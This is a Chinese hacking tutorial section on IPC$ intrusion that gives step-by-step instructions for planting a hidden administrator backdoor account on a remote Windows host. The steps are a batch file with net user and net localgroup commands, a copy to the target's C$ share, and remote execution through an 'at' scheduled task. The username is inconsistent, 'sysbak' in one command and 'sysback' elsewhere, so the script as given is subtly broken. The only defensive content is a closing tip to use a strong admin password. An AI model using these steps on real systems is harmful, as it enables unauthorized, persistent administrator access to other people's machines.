ICP入侵2

绝对の坏男人

2.1 IPC$入侵(2)
   
2.1.2  留后门账号
1．相关知识
（1）什么是BAT文件
BAT文件是在Windows系统中的一种文件格式，称为批处理文件。简单来说，就是把需要执行的一系列DOS命令按顺序先后写在一个后缀名为BAT的文本文件中。通过鼠标双击或DOS命令执行该BAT文件，就相当于执行一系列DOS命令。
（2）什么是计划任务
举个例子，假设想在明天上午10点给电脑杀毒，但是正好明天上午10点要出去办事，那怎么办呢？这时候就要使用“计划任务”这个功能，令计算机在明天上午10点自动执行杀毒程序。计划任务是Windows系统自带的功能，可以在控制面板中找到，如图2-10所示。除此之外，还可能用命令行的方式来添加计划任务。
（3）相关DOS命令
è copy命令：把一个文件拷贝到另一个地方，“另一个地方”可以是本地计算机的目录、磁盘，也可以是另一台主机的目录或磁盘。
è  at命令：用来建立计划任务。
è  net time命令：用来查看目标计算机的系统时间，以便使用计划任务指定时间。
è  net user命令，用来管理计算机上面的账号。
— 查看账号命令：net user
— 建立账号命令：net user name passwd /add
— 删除账号命令：net user name passwd /del
è  net localgroup命令：用来管理工作组。
2．实例：建立后门账号
步骤一：编写BAT文件。
打开记事本，键入“net user sysbak 123456 /add”和“net localgroup administrators sysback /add”命令。
编写好命令后，把该文件另存为“hack.bat”。下面对这两个命令进行说明。
命令一：net user sysbak 123456 /add。该命令表示添加用户名为sysback，密码为123456的账号。
参数说明：
è “sysback”：用户名。
è “123456”：用户的密码。
è “/add”：表示添加账号。
命令二：net localgroup administrators sysback /add。该命令表示把sysback添加到管理员组（administrators）。
参数说明：
è “administrators”：表示管理员组。
è “sysback”：刚建立的用户名。
è “/add”：表示添加账号。
步骤二：与目标主机建立IPC$连接。
在2.1.1节的实例中已经介绍过这一步骤，所以这里省略。
步骤三：拷贝文件至目标主机。
使用命令：copy FILE \\IP\PATH
参数说明：
è “FILE”表示本地的文件名。
è “IP”为目标主机的IP地址。
è “PATH”保存文件的路径。
打开MS-DOS，键入“copy hack.bat \\192.168.27.128\c$”命令。
copy命令执行成功后，就已经把D盘下的hack.bat文件拷贝到192.168.27.128的C盘内。此外，也可以在图形界面下把hack.bat复制、粘贴到目标主机中。
步骤四：通过计划任务使远程主机执行hack.bat文件。
首先键入“net time \\IP”命令查看远程主机的系统时间，再键入“at \\IP TIME COMMAND”命令在远程主机上建立计划任务。
参数说明：
è IP：目标主机IP。
è TIME：设定计划任务执行的时间。
è COMMAND：计划任务要执行的命令。
打开MS-DOS，键入“net time \\192.168.27.128”命令。

从回显可知，目标系统时间为13:33，然后根据该时间为远程主机建立计划任务。键入“at \\192.168.27.128 13:45 c:\hack.bat”命令，该命令表示在下午13点45分执行目标主机C盘中的hack.bat文件。计划任务添加完毕后，使用命令“net use * /del”断开IPC$连接。

步骤五：验证账号是否成功建立。
等待一段时间后，估计远程主机已经执行了hack.bat文件。下面通过建立IPC$连接来验证是否成功建立“sysback”账号。如图2-15所示，连接成功！说明管理员账号“sysback”已经成功建立。
建议大家把管理员密码设复杂点！！